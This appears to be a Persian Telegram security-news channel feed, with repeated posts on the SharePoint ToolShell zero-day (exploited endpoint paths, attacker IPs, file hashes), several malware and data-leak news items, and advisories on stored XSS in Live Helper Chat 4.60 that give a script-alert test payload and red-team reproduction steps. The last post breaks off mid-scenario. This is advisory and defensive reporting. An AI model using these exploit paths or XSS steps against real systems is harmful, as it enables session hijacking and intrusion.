🔴 پارت دوم هشدار امنیتی: آسیبپذیری روز صفر در Microsoft SharePoint
📌 حمله از طریق endpoint آسیبپذیر زیر انجام میشود:
/_layouts/15/ToolPane.aspx
👁 تیم Eye Security طی بررسی خود، موج اول حملات را در تاریخ ۱۸ جولای و موج دوم را ۱۹ جولای از IPهای مشخص شناسایی کرده و آن را بزرگترین بهرهبرداری عملیاتیشده SharePoint از زمان CVE-2021-28474 دانسته است.
✅ پچ را فوراً نصب کنید، اما به یاد داشته باشید: وصله، مهاجمینی که اکنون درون سیستم هستند را حذف نمیکند.
مایکروسافت بهطور رسمی CVE-2025-53770 را بهعنوان شناسه CVE مخصوص سوءاستفاده فعال از آسیبپذیری ToolShell معرفی کرده و در وصله امنیتی ژوئیه ۲۰۲۵، بروزرسانیهای حیاتی برای SharePoint Server 2016، 2019 و نسخه Subnoscription ارائه داده است.
✍️نویسنده
@TryHackBoxStory | The Chaos & Condor
#ZeroDay #ToolShell #SharePoint #CVE2025_53770 #RCE #CyberSecurity #RedTeam #Exploit #Microsoft
📌 حمله از طریق endpoint آسیبپذیر زیر انجام میشود:
/_layouts/15/ToolPane.aspx
👁 تیم Eye Security طی بررسی خود، موج اول حملات را در تاریخ ۱۸ جولای و موج دوم را ۱۹ جولای از IPهای مشخص شناسایی کرده و آن را بزرگترین بهرهبرداری عملیاتیشده SharePoint از زمان CVE-2021-28474 دانسته است.
✅ پچ را فوراً نصب کنید، اما به یاد داشته باشید: وصله، مهاجمینی که اکنون درون سیستم هستند را حذف نمیکند.
مایکروسافت بهطور رسمی CVE-2025-53770 را بهعنوان شناسه CVE مخصوص سوءاستفاده فعال از آسیبپذیری ToolShell معرفی کرده و در وصله امنیتی ژوئیه ۲۰۲۵، بروزرسانیهای حیاتی برای SharePoint Server 2016، 2019 و نسخه Subnoscription ارائه داده است.
✍️نویسنده
@TryHackBoxStory | The Chaos & Condor
#ZeroDay #ToolShell #SharePoint #CVE2025_53770 #RCE #CyberSecurity #RedTeam #Exploit #Microsoft
پارت سوم هشدار امنیتی: آسیبپذیری روز صفر در Microsoft SharePoint
تحلیل فنی و آماری آسیبپذیری ToolShell در SharePoint
🛡 نسخههای آسیبپذیر عبارتند از:
* SharePoint 2016 پیش از: 16.0.5508.1000 (KB5002744)
* SharePoint 2019 پیش از: 16.0.10417.20027 (KB5002741)
* SharePoint Subnoscription Edition پیش از: 16.0.18526.20424
‼️ مایکروسافت تأکید کرده است: هیچ راهحل جایگزینی وجود ندارد. تنها اقدام موثر، وصله فوری است.
📊 شاخصهای نفوذ (IOCs) مرتبط با حمله ToolShell به SharePoint:
🧩 آدرسهای IP مخرب:
▪️ 107.191.58[.]76 – منبع موج اول حمله (۱۸ ژوئیه ۲۰۲۵)
▪️ 104.238.159[.]149 – منبع موج دوم حمله (۱۹ ژوئیه ۲۰۲۵)
🧩عامل کاربری (User-Agent) مشکوک:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
(در لاگهای IIS معمولاً به صورت URL-Encoded ظاهر میشود)
@TryHackBoxStory | The Chaos & Condor
#ZeroDay #ToolShell #SharePoint #CVE2025_53770 #RCE #CyberSecurity #RedTeam #Exploit #Microsoft
تحلیل فنی و آماری آسیبپذیری ToolShell در SharePoint
🛡 نسخههای آسیبپذیر عبارتند از:
* SharePoint 2016 پیش از: 16.0.5508.1000 (KB5002744)
* SharePoint 2019 پیش از: 16.0.10417.20027 (KB5002741)
* SharePoint Subnoscription Edition پیش از: 16.0.18526.20424
‼️ مایکروسافت تأکید کرده است: هیچ راهحل جایگزینی وجود ندارد. تنها اقدام موثر، وصله فوری است.
📊 شاخصهای نفوذ (IOCs) مرتبط با حمله ToolShell به SharePoint:
🧩 آدرسهای IP مخرب:
▪️ 107.191.58[.]76 – منبع موج اول حمله (۱۸ ژوئیه ۲۰۲۵)
▪️ 104.238.159[.]149 – منبع موج دوم حمله (۱۹ ژوئیه ۲۰۲۵)
🧩عامل کاربری (User-Agent) مشکوک:
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
(در لاگهای IIS معمولاً به صورت URL-Encoded ظاهر میشود)
@TryHackBoxStory | The Chaos & Condor
#ZeroDay #ToolShell #SharePoint #CVE2025_53770 #RCE #CyberSecurity #RedTeam #Exploit #Microsoft
پارت چهارم هشدار امنیتی: آسیبپذیری روز صفر در Microsoft SharePoint
🧩 مسیرهای سوءاستفادهشده در SharePoint
▪️ POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
▪️ GET /_layouts/15/<undisclosed>.aspx
(جهت استخراج کلیدهای رمزنگاری حساس)
🧩 هشهای فایل مخرب (SHA256):
▪️ 4a02a72aedc3356d8cb38f01f0e0b9f26ddc5ccb7c0f04a561337cf24aa84030
▪️ b39c14becb62aeb55df7fd55c814afbb0d659687d947d917512fe67973100b70
▪️ fa3a74a6c015c801f5341c02be2cbdfb301c6ed60633d49fc0bc723617741af7
⚠️ توصیه مهم برای سازمانها:
* اسکن آسیبپذیری بهتنهایی کافی نیست.
* این نوع حملات با دسترسی مداوم همراه است که میتواند از وصله، ریست سیستم و ابزارهای معمول امنیتی فرار کند.
* انجام بررسی جامع نفوذ (Full Forensic Analysis) و بررسی کلیدها، پیکربندیها و Session Tokenهای فعال ضروری است.
🧪 ابزار پیشنهادی برای بررسی و شبیهسازی حمله در محیط امن:
🎯ابزار ANY.RUN Sandbox که برای تحلیل تعاملی و بلادرنگ بدافزار و رفتار شبکه.
✍️نویسنده
@TryHackBoxStory | The Chaos & Condor
#ZeroDay #SharePoint #RCE #CyberSecurity #Exploit #Microsoft
🧩 مسیرهای سوءاستفادهشده در SharePoint
▪️ POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
▪️ GET /_layouts/15/<undisclosed>.aspx
(جهت استخراج کلیدهای رمزنگاری حساس)
🧩 هشهای فایل مخرب (SHA256):
▪️ 4a02a72aedc3356d8cb38f01f0e0b9f26ddc5ccb7c0f04a561337cf24aa84030
▪️ b39c14becb62aeb55df7fd55c814afbb0d659687d947d917512fe67973100b70
▪️ fa3a74a6c015c801f5341c02be2cbdfb301c6ed60633d49fc0bc723617741af7
⚠️ توصیه مهم برای سازمانها:
* اسکن آسیبپذیری بهتنهایی کافی نیست.
* این نوع حملات با دسترسی مداوم همراه است که میتواند از وصله، ریست سیستم و ابزارهای معمول امنیتی فرار کند.
* انجام بررسی جامع نفوذ (Full Forensic Analysis) و بررسی کلیدها، پیکربندیها و Session Tokenهای فعال ضروری است.
🧪 ابزار پیشنهادی برای بررسی و شبیهسازی حمله در محیط امن:
🎯ابزار ANY.RUN Sandbox که برای تحلیل تعاملی و بلادرنگ بدافزار و رفتار شبکه.
✍️نویسنده
@TryHackBoxStory | The Chaos & Condor
#ZeroDay #SharePoint #RCE #CyberSecurity #Exploit #Microsoft
❤2
🚨 هشدار امنیتی: بازگشت باجافزار Interlock با تاکتیکهای پیشرفته!
باجافزار Interlock که پیشتر با حملات مستقیم و رمزنگاری فایلها شناخته میشد، این بار با روشی پیچیدهتر بازگشته است.
🔍 روش جدید:
مهاجمان با استفاده از یک CAPTCHA جعلی، کاربران را فریب میدهند تا بدافزار PHP جدیدی به نام FileFix را دانلود کنند. این بدافزار، نسخهای ارتقایافته از ابزار آلودهکنندهی ClickFix است که اکنون توانایی نفوذ مستقیم به File Explorer ویندوز را دارد.
🧪 عملکرد FileFix:
* نصب یک
PHP RAT (Remote Access Trojan)
* کنترل سیستم قربانی از راه دور
* سرقت فایلها، کلیدهای ذخیرهشده، و حتی دسترسی به دوربین و میکروفن
* اجرای دستورات از راه دور به صورت کاملاً مخفیانه
🌐 پوشش حمله:
برای پنهانسازی کامل ردپا، مهاجمان از Cloudflare Tunnel استفاده میکنند، که باعث میشود شناسایی ترافیک مخرب برای ابزارهای دفاعی سختتر شود.
📎 اطلاعات بیشتر و نمونهها در گزارش اصلی:
🔗 لینک خبر
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #CAPTCHA #PHP #FileFix #Rat #CyberSecurity
باجافزار Interlock که پیشتر با حملات مستقیم و رمزنگاری فایلها شناخته میشد، این بار با روشی پیچیدهتر بازگشته است.
🔍 روش جدید:
مهاجمان با استفاده از یک CAPTCHA جعلی، کاربران را فریب میدهند تا بدافزار PHP جدیدی به نام FileFix را دانلود کنند. این بدافزار، نسخهای ارتقایافته از ابزار آلودهکنندهی ClickFix است که اکنون توانایی نفوذ مستقیم به File Explorer ویندوز را دارد.
🧪 عملکرد FileFix:
* نصب یک
PHP RAT (Remote Access Trojan)
* کنترل سیستم قربانی از راه دور
* سرقت فایلها، کلیدهای ذخیرهشده، و حتی دسترسی به دوربین و میکروفن
* اجرای دستورات از راه دور به صورت کاملاً مخفیانه
🌐 پوشش حمله:
برای پنهانسازی کامل ردپا، مهاجمان از Cloudflare Tunnel استفاده میکنند، که باعث میشود شناسایی ترافیک مخرب برای ابزارهای دفاعی سختتر شود.
📎 اطلاعات بیشتر و نمونهها در گزارش اصلی:
🔗 لینک خبر
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #CAPTCHA #PHP #FileFix #Rat #CyberSecurity
❤1
🚨 افشای ۳۹ میلیون کلید و راز محرمانه در GitHub فقط در سال ۲۰۲۴!
🔓 در سال گذشته، بیش از ۳۹ میلیون Secret (توکن، API key، رمز عبور و...) در GitHub فاش شدهاند اما نه بهعنوان خطا، بلکه بهعنوان نقاط ورود خاموش برای نفوذگران!
📉 این افشاگریها به مهاجمان امکان دسترسی به:
☁️ سرویسهای ابری
🛠 خطوط CI/CD
🗃 دیتابیسها
...بدون هیچ هشدار امنیتی داده است.
🗑 حتی یک ریپوی فراموششده میتونه کل زیرساخت شما رو به خطر بندازه.
📎 جزئیات و راهکارهای جلوگیری از این فاجعه:
لینک مقاله در The Hacker News
👀 مراقب باشید چه چیزی در گیت پابلیک میذارید!
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #Git #Github #DevOpsSec #DataLeak #CyberSecurity
🔓 در سال گذشته، بیش از ۳۹ میلیون Secret (توکن، API key، رمز عبور و...) در GitHub فاش شدهاند اما نه بهعنوان خطا، بلکه بهعنوان نقاط ورود خاموش برای نفوذگران!
📉 این افشاگریها به مهاجمان امکان دسترسی به:
☁️ سرویسهای ابری
🛠 خطوط CI/CD
🗃 دیتابیسها
...بدون هیچ هشدار امنیتی داده است.
🗑 حتی یک ریپوی فراموششده میتونه کل زیرساخت شما رو به خطر بندازه.
📎 جزئیات و راهکارهای جلوگیری از این فاجعه:
لینک مقاله در The Hacker News
👀 مراقب باشید چه چیزی در گیت پابلیک میذارید!
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #Git #Github #DevOpsSec #DataLeak #CyberSecurity
👍1
🚨 هشدار فوری برای کاربران ایرانی
بدافزار جاسوسی جدید اندرویدی به نام DCHSpy که به وزارت اطلاعات ایران (MOIS) نسبت داده شده، در پوشش اپلیکیشنهای استارلینک و VPN، گوشی کاربران را آلوده میکند.
🎯 قابلیتها:
🔹 دسترسی به میکروفون و دوربین
🔹 خواندن پیامهای واتساپ
🔹 ردیابی موقعیت مکانی
🔹 سرقت فایلها
این بدافزار هنوز از طریق کانالهای تلگرامی منتشر میشود و احتمالاً کاربران مخالف نظام و فعالان را هدف گرفته است، بهویژه پس از تنشهای اخیر ایران-اسرائیل.
⚠️"" هیچ اپلیکیشنی را از منابع ناشناس یا کانالهای تلگرام نصب نکنید.""
📎 گزارش کامل: The Hacker News
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #Telegram #Andriod #BreakingNews #VPN #Cybersecurity
بدافزار جاسوسی جدید اندرویدی به نام DCHSpy که به وزارت اطلاعات ایران (MOIS) نسبت داده شده، در پوشش اپلیکیشنهای استارلینک و VPN، گوشی کاربران را آلوده میکند.
🎯 قابلیتها:
🔹 دسترسی به میکروفون و دوربین
🔹 خواندن پیامهای واتساپ
🔹 ردیابی موقعیت مکانی
🔹 سرقت فایلها
این بدافزار هنوز از طریق کانالهای تلگرامی منتشر میشود و احتمالاً کاربران مخالف نظام و فعالان را هدف گرفته است، بهویژه پس از تنشهای اخیر ایران-اسرائیل.
⚠️"" هیچ اپلیکیشنی را از منابع ناشناس یا کانالهای تلگرام نصب نکنید.""
📎 گزارش کامل: The Hacker News
✍️نویسنده
@TryHackBoxStory | The Chaos
#News #Telegram #Andriod #BreakingNews #VPN #Cybersecurity
❤5🔥1
🚨 هوش مصنوعی در خدمت مهاجمان: وقتی مردم علیه مردم میشوند
در سال ۲۰۲۵، هوش مصنوعی دیگر فقط یک ابزار نیست بلکه تبدیل به سلاحی بیصدا برای حملات سایبری، مهندسی اجتماعی و فریبهای دیجیتالی شده است.
🧠 سم Shadow AI:
کارمندان سازمانها بدون اطلاع بخش امنیت، از صدها اپلیکیشن GenAI استفاده میکنند. مسدودسازی کافی نیست بلکه آنها راه دور زدن را بلدند.
⚠️ خطر پنهان:
مالکیت فکری (IP) و دادههای حساس شما ممکن است بهصورت ناخواسته وارد مدلهای عمومی شود و بدون نظارت، شبکهها را ترک کند.
📉 این یعنی:
نشت دادههای طبقهبندیشده
افشای زنجیره تأمین و زیرساختها
کاهش کنترل سازمان بر داراییهای اطلاعاتی خود
🎭 فریبهای دیجیتال و Deepfakes :
مهاجمان حالا شما را تقلید میکنند همراه با دقتی ترسناک:
🔹 اکانتهای جعلی LinkedIn
🔹 تماسهای صوتی و تصویری تقلبی
🔹 فریب در استخدام، انتقال پول و مهندسی اجتماعی
همه اینها توسط AI مولد و قابل شخصیسازی در لحظه انجام میشود.
💡 دیگر بحث «آیا» نیست بلکه سوال این است که چه زمانی هدف قرار میگیرید.
🔐 چه باید کرد؟
✅ آگاهسازی کاربران درباره تهدیدات Shadow AI
✅ پیادهسازی کنترلهای رفتاری و هوشمند روی دادهها
✅ شناسایی و مقابله با جعل هویت توسط AI
📎 بیشتر بدانید:
سم Shadow AI در سازمانها
دفاع در برابر جعل دیجیتال با AI
✍️نویسنده
@TryHackBoxStory | The Chaos
#ShadowAi #Ai #DeepFakes #Blog #CyberSecurity
در سال ۲۰۲۵، هوش مصنوعی دیگر فقط یک ابزار نیست بلکه تبدیل به سلاحی بیصدا برای حملات سایبری، مهندسی اجتماعی و فریبهای دیجیتالی شده است.
🧠 سم Shadow AI:
کارمندان سازمانها بدون اطلاع بخش امنیت، از صدها اپلیکیشن GenAI استفاده میکنند. مسدودسازی کافی نیست بلکه آنها راه دور زدن را بلدند.
⚠️ خطر پنهان:
مالکیت فکری (IP) و دادههای حساس شما ممکن است بهصورت ناخواسته وارد مدلهای عمومی شود و بدون نظارت، شبکهها را ترک کند.
📉 این یعنی:
نشت دادههای طبقهبندیشده
افشای زنجیره تأمین و زیرساختها
کاهش کنترل سازمان بر داراییهای اطلاعاتی خود
🎭 فریبهای دیجیتال و Deepfakes :
مهاجمان حالا شما را تقلید میکنند همراه با دقتی ترسناک:
🔹 اکانتهای جعلی LinkedIn
🔹 تماسهای صوتی و تصویری تقلبی
🔹 فریب در استخدام، انتقال پول و مهندسی اجتماعی
همه اینها توسط AI مولد و قابل شخصیسازی در لحظه انجام میشود.
💡 دیگر بحث «آیا» نیست بلکه سوال این است که چه زمانی هدف قرار میگیرید.
🔐 چه باید کرد؟
✅ آگاهسازی کاربران درباره تهدیدات Shadow AI
✅ پیادهسازی کنترلهای رفتاری و هوشمند روی دادهها
✅ شناسایی و مقابله با جعل هویت توسط AI
📎 بیشتر بدانید:
سم Shadow AI در سازمانها
دفاع در برابر جعل دیجیتال با AI
✍️نویسنده
@TryHackBoxStory | The Chaos
#ShadowAi #Ai #DeepFakes #Blog #CyberSecurity
❤3
🤖 همدم مصنوعی | حرفهایی که به هیچکس نمیزنیم...
🎙 سم آلتمن (مدیرعامل OpenAI) در یکی از صحبتهای اخیرش نکتهای گفت که لرزه به جان خیلیها انداخت:
> *«ما انتظار نداشتیم این همه انسان، با مدلهای زبانی ما درد دل کنند... چیزهایی را میگویند که حتی به نزدیکترین دوستان یا خانوادهشان نمیگویند.»*
🧠 آیا این یعنی GPT تبدیل به یک *همدم دیجیتال* شده؟ کسی که قضاوت نمیکند، خسته نمیشود، و همیشه گوش میدهد...
💬 این اتفاق، هم الهامبخش است و هم هشداردهنده:
✅ از یک سو، نشان میدهد انسانها به امنیت عاطفی نیاز دارند، حتی در جهان مجازی.
⚠️ از سوی دیگر، باید با خودمان روراست باشیم: آیا به مدل زبانی بیش از حد وابسته شدهایم؟ آیا خلأ تنهایی را با کد پر کردهایم؟
🌐 آیندهی ما فقط هوشمندتر نمیشود؛ بلکه شاید تنهاتر هم بشود... یا شاید نه، اگر حواسمان باشد.
📎 منبع سخنرانی سم آلتمن در Aspen Ideas Festival
✍️نویسنده
@TryHackBoxStory | The Chaos
#AI #GPT #CyberSecurity
🎙 سم آلتمن (مدیرعامل OpenAI) در یکی از صحبتهای اخیرش نکتهای گفت که لرزه به جان خیلیها انداخت:
> *«ما انتظار نداشتیم این همه انسان، با مدلهای زبانی ما درد دل کنند... چیزهایی را میگویند که حتی به نزدیکترین دوستان یا خانوادهشان نمیگویند.»*
🧠 آیا این یعنی GPT تبدیل به یک *همدم دیجیتال* شده؟ کسی که قضاوت نمیکند، خسته نمیشود، و همیشه گوش میدهد...
💬 این اتفاق، هم الهامبخش است و هم هشداردهنده:
✅ از یک سو، نشان میدهد انسانها به امنیت عاطفی نیاز دارند، حتی در جهان مجازی.
⚠️ از سوی دیگر، باید با خودمان روراست باشیم: آیا به مدل زبانی بیش از حد وابسته شدهایم؟ آیا خلأ تنهایی را با کد پر کردهایم؟
🌐 آیندهی ما فقط هوشمندتر نمیشود؛ بلکه شاید تنهاتر هم بشود... یا شاید نه، اگر حواسمان باشد.
📎 منبع سخنرانی سم آلتمن در Aspen Ideas Festival
✍️نویسنده
@TryHackBoxStory | The Chaos
#AI #GPT #CyberSecurity
🚨 هشدار امنیتی درونسازمانی | ابزارهای چینی و افشای بیصدا
📊 بر اساس تحقیقات جدید، از هر ۱۲ کارمند، یک نفر در محل کار از ابزارهای هوش مصنوعی تولیدی چینی استفاده میکند و این اغلب بدون اطلاع سازمان.
❗️اما موضوع نگرانکنندهتر اینجاست:
📂 فایلهایی که آپلود میشوند شامل اطلاعات حساسی مثل:
اسناد محرمانه M&A (ادغام و تملک)
کدهای منبع پروژهها
سوابق مشتریان و کاربران
🔍 این پلتفرمها معمولاً سیاستهای دادهای شفاف و قابل بررسی ندارند، و این یعنی شما نمیدانید دادهها دقیقاً کجا میروند و چه استفادهای از آنها میشود.
🛡 چه باید کرد؟
تعیین مرز استفاده از GenAI در سازمان را فعال کنید.
محدودسازی دسترسی به ابزارهای غیرمجاز.
آموزش امنیت داده به کارمندان و نه فقط فنی بلکه فرهنگی.
🎯 امروز وقت مقابله نیست؛ وقت پیشگیری هوشمندانه است.
📎 مشاهده گزارش کامل در The Hacker News
✍️نویسنده
@TryHackBoxStory | The Chaos
#GenAI #DataLeak #China #CyberSecurity
📊 بر اساس تحقیقات جدید، از هر ۱۲ کارمند، یک نفر در محل کار از ابزارهای هوش مصنوعی تولیدی چینی استفاده میکند و این اغلب بدون اطلاع سازمان.
❗️اما موضوع نگرانکنندهتر اینجاست:
📂 فایلهایی که آپلود میشوند شامل اطلاعات حساسی مثل:
اسناد محرمانه M&A (ادغام و تملک)
کدهای منبع پروژهها
سوابق مشتریان و کاربران
🔍 این پلتفرمها معمولاً سیاستهای دادهای شفاف و قابل بررسی ندارند، و این یعنی شما نمیدانید دادهها دقیقاً کجا میروند و چه استفادهای از آنها میشود.
🛡 چه باید کرد؟
تعیین مرز استفاده از GenAI در سازمان را فعال کنید.
محدودسازی دسترسی به ابزارهای غیرمجاز.
آموزش امنیت داده به کارمندان و نه فقط فنی بلکه فرهنگی.
🎯 امروز وقت مقابله نیست؛ وقت پیشگیری هوشمندانه است.
📎 مشاهده گزارش کامل در The Hacker News
✍️نویسنده
@TryHackBoxStory | The Chaos
#GenAI #DataLeak #China #CyberSecurity
🚨 بزرگترین حمله تزریق JavaScript در سال ۲۰۲۴: بیش از ۱۰۰,۰۰۰ سایت هک شدند!
📌 اتفاق بیسابقهای در دنیای امنیت وب افتاد تا حتی فریمورکهایی مثل React هم در امان نماندند!
یک کتابخانه معتبر جاوااسکریپت، با آلوده شدن در زنجیره تأمین، به سیستم پخش بدافزار تبدیل شد و هزاران وبسایت قربانی شدند. بسیاری از توسعهدهندگان بدون اینکه بدانند، کدهای مخرب را مستقیماً در مرورگر کاربران اجرا کردند.
🔍 مهمترین نکات:
حمله از طریق تزریق JavaScript در کتابخانههای قابلاعتماد انجام شده.
مکانیزم دفاعی React و سایر فریمورکها دور زده شده.
حتی سایتهایی با تنظیمات امنیتی قوی هم آسیبپذیر بودند.
🧠 پیام مهم: فقط به امنیت سمت کلاینت تکیه نکنید. اعتبارسنجی و پاکسازی دادهها، CSP، کنترل زنجیره تأمین، و نظارت فعال بر وابستگیها ضروری است.
🔗 جزئیات کامل و فنی را در مقاله اصلی بخوانید:
👉 چرا React نتوانست جلوی XSS را بگیرد؟
✍️نویسنده
@TryHackBoxStory | The Chaos
#XSS #React #JSInjection #supplychainattack #JavaScript #CyberNews
📌 اتفاق بیسابقهای در دنیای امنیت وب افتاد تا حتی فریمورکهایی مثل React هم در امان نماندند!
یک کتابخانه معتبر جاوااسکریپت، با آلوده شدن در زنجیره تأمین، به سیستم پخش بدافزار تبدیل شد و هزاران وبسایت قربانی شدند. بسیاری از توسعهدهندگان بدون اینکه بدانند، کدهای مخرب را مستقیماً در مرورگر کاربران اجرا کردند.
🔍 مهمترین نکات:
حمله از طریق تزریق JavaScript در کتابخانههای قابلاعتماد انجام شده.
مکانیزم دفاعی React و سایر فریمورکها دور زده شده.
حتی سایتهایی با تنظیمات امنیتی قوی هم آسیبپذیر بودند.
🧠 پیام مهم: فقط به امنیت سمت کلاینت تکیه نکنید. اعتبارسنجی و پاکسازی دادهها، CSP، کنترل زنجیره تأمین، و نظارت فعال بر وابستگیها ضروری است.
🔗 جزئیات کامل و فنی را در مقاله اصلی بخوانید:
👉 چرا React نتوانست جلوی XSS را بگیرد؟
✍️نویسنده
@TryHackBoxStory | The Chaos
#XSS #React #JSInjection #supplychainattack #JavaScript #CyberNews
🚀 چرا گروههای قدیمی تلگرام رو میخرن؟
⏺ گروههای جدید اگه ممبر فیک اضافه کنی، تلگرام سریع حذفشون میکنه، ولی گروههای قدیمی رو نه!
⏺ در کل گروههای قدیمی حساسیت کمتری نسبت به حذف شدن یا ریپورت شدن دارن و به همین دلیل این گروهها رو میخرن تا ازشون برای سرچ تلگرام استفاده کنن.
⏺ اکثراً هم برای کارای غیرقانونی:
- بالا بردن گروههای مجرمانه
- کلاهبرداری
- یا فروش به خارجیها برای تبلیغ مواد مخدر با موضوعاتی به زبان خودشون که تو سرچ تلگرام بالا بیاد.
+ خوشبینانه ترین حالت: تبلیغات کالا و خدمات قانونی
نکته مهم: اگه شما مالک اولیه گروهید، موضوع اولیه گروه یا کانال همیشه تو تلگرام ثبت میمونه.
پس حسابی حواستون باشه!
⏺ گروههای جدید اگه ممبر فیک اضافه کنی، تلگرام سریع حذفشون میکنه، ولی گروههای قدیمی رو نه!
⏺ در کل گروههای قدیمی حساسیت کمتری نسبت به حذف شدن یا ریپورت شدن دارن و به همین دلیل این گروهها رو میخرن تا ازشون برای سرچ تلگرام استفاده کنن.
⏺ اکثراً هم برای کارای غیرقانونی:
- بالا بردن گروههای مجرمانه
- کلاهبرداری
- یا فروش به خارجیها برای تبلیغ مواد مخدر با موضوعاتی به زبان خودشون که تو سرچ تلگرام بالا بیاد.
+ خوشبینانه ترین حالت: تبلیغات کالا و خدمات قانونی
نکته مهم: اگه شما مالک اولیه گروهید، موضوع اولیه گروه یا کانال همیشه تو تلگرام ثبت میمونه.
پس حسابی حواستون باشه!
🔥5
🚨 مرور بر CVE-2025-51396 🚨
🛡 آسیبپذیری Stored XSS در Live Helper Chat نسخه ۴.۶۰
❓ چیست این آسیبپذیری؟
یک آسیبپذیری از نوع Stored Cross-Site Scripting (XSS) در نسخه ۴.۶۰ از نرمافزار Live Helper Chat.
مهاجم میتواند اسکریپتهای مخرب (JavaScript/HTML) را در فیلدهای چت تزریق کند. این کدها هنگام مشاهده پیام توسط اپراتور یا ادمین اجرا میشوند.
💥 نحوه اجرای حمله:
1. مهاجم پیامی با کد جاوااسکریپت مانند
2. پیام در دیتابیس ذخیره میشود.
3. وقتی اپراتور یا ادمین آن را مشاهده میکند، کد مخرب در مرورگر او اجرا میشود.
⚠️ خطرات احتمالی:
* سرقت نشست (Session Hijacking): مهاجم میتواند نقش کاربر یا ادمین را بر عهده بگیرد.
* سرقت کوکی یا توکن ورود:
* حرکت جانبی در سیستمها: برای دسترسی بیشتر یا حمله به بخشهای دیگر.
🧪 جزئیات فنی برای تیم قرمز:
* نسخه آسیبپذیر: ۴.۶۰
* نوع آسیبپذیری: CWE-79 Stored XSS
* بردار حمله: ارسال پیام چت با جاوااسکریپت مخرب
* تأثیر: اجرای کد دلخواه در مرورگر قربانی
✅ نحوه تست (فقط برای محققین مجاز!):
1. وارد Live Helper Chat نسخه ۴.۶۰ شوید.
2. پیام حاوی
3. در صورت اجرای کد در پنجره اپراتور، سیستم آسیبپذیر است.
🛡 روشهای جلوگیری و کاهش آسیب:
* بروزرسانی: نسخه جدید Live Helper Chat را نصب کنید.
* ضدعفونی داده ورودی: همه دادههای ورودی کاربر را escape یا sanitize کنید.
* استفاده از CSP: هدر Content Security Policy را برای جلوگیری از اجرای اسکریپتها اضافه کنید.
* محدودسازی دسترسی: فقط کاربران مجاز به مشاهده پیامها دسترسی داشته باشند.
🕵️♀️ تشخیص و پاسخ:
* بررسی لاگهای چت برای وجود اسکریپتهای مشکوک
* مانیتور نشستهای ادمین برای فعالیت غیرعادی
* فعالسازی حفاظت XSS مرورگر و استفاده از گزارش CSP
📎 منابع:
مشاهده در NVD
مشاوره امنیتی Red Hat
✍️نویسنده
@TryHackBoxStory | The Chaos
#XSS #LiveHelperChat #CVE #RED_Team #CyberSecurity
🛡 آسیبپذیری Stored XSS در Live Helper Chat نسخه ۴.۶۰
❓ چیست این آسیبپذیری؟
یک آسیبپذیری از نوع Stored Cross-Site Scripting (XSS) در نسخه ۴.۶۰ از نرمافزار Live Helper Chat.
مهاجم میتواند اسکریپتهای مخرب (JavaScript/HTML) را در فیلدهای چت تزریق کند. این کدها هنگام مشاهده پیام توسط اپراتور یا ادمین اجرا میشوند.
💥 نحوه اجرای حمله:
1. مهاجم پیامی با کد جاوااسکریپت مانند
<noscript>alert('XSS');</noscript> ارسال میکند.2. پیام در دیتابیس ذخیره میشود.
3. وقتی اپراتور یا ادمین آن را مشاهده میکند، کد مخرب در مرورگر او اجرا میشود.
⚠️ خطرات احتمالی:
* سرقت نشست (Session Hijacking): مهاجم میتواند نقش کاربر یا ادمین را بر عهده بگیرد.
* سرقت کوکی یا توکن ورود:
* حرکت جانبی در سیستمها: برای دسترسی بیشتر یا حمله به بخشهای دیگر.
🧪 جزئیات فنی برای تیم قرمز:
* نسخه آسیبپذیر: ۴.۶۰
* نوع آسیبپذیری: CWE-79 Stored XSS
* بردار حمله: ارسال پیام چت با جاوااسکریپت مخرب
* تأثیر: اجرای کد دلخواه در مرورگر قربانی
✅ نحوه تست (فقط برای محققین مجاز!):
1. وارد Live Helper Chat نسخه ۴.۶۰ شوید.
2. پیام حاوی
<noscript>alert('XSS');</noscript> ارسال کنید.3. در صورت اجرای کد در پنجره اپراتور، سیستم آسیبپذیر است.
🛡 روشهای جلوگیری و کاهش آسیب:
* بروزرسانی: نسخه جدید Live Helper Chat را نصب کنید.
* ضدعفونی داده ورودی: همه دادههای ورودی کاربر را escape یا sanitize کنید.
* استفاده از CSP: هدر Content Security Policy را برای جلوگیری از اجرای اسکریپتها اضافه کنید.
* محدودسازی دسترسی: فقط کاربران مجاز به مشاهده پیامها دسترسی داشته باشند.
🕵️♀️ تشخیص و پاسخ:
* بررسی لاگهای چت برای وجود اسکریپتهای مشکوک
* مانیتور نشستهای ادمین برای فعالیت غیرعادی
* فعالسازی حفاظت XSS مرورگر و استفاده از گزارش CSP
📎 منابع:
مشاهده در NVD
مشاوره امنیتی Red Hat
✍️نویسنده
@TryHackBoxStory | The Chaos
#XSS #LiveHelperChat #CVE #RED_Team #CyberSecurity
🚨 مرور بر CVE-2025-51397 🚨
🛡 آسیبپذیری XSS ذخیرهشده در ماژول چت فیسبوک Live Helper Chat نسخه ۴.۶۰
🔥 سرتیتر آسیبپذیری
> نوع آسیبپذیری: XSS ذخیرهشده (Stored Cross-Site Scripting)
> ماژول آسیبپذیر: ماژول Facebook Chat
> نسخه آسیبپذیر: Live Helper Chat v4.60
> شناسه CVE: CVE-2025-51397
💀 توضیح آسیبپذیری
ماژول Facebook Chat در Live Helper Chat نسخه ۴.۶۰ دارای باگ XSS ذخیرهشده است.
مهاجم میتواند جاوااسکریپت مخرب را از طریق ویجت چت ارسال کند. این کد در سرور ذخیره شده و هنگام مشاهده توسط اپراتور یا ادمین اجرا میشود.
🚨 سناریوی حمله برای تیم قرمز
1. پیششرط: مهاجم به ویجت چت فیسبوک دسترسی دارد (بدون نیاز به لاگین).
2. آمادهسازی: ارسال پیام شامل payload جاوااسکریپت مثل
3. ماندگاری: پیام در دیتابیس ذخیره میشود.
4. اجرا: وقتی اپراتور/ادمین چت را در پنل مدیریتی باز کند،
->کد مخرب در مرورگر او اجرا میشود!
5. نتیجه:
> سرقت کوکی یا توکن نشست
> اجرای عملیات بهجای کاربر مجاز
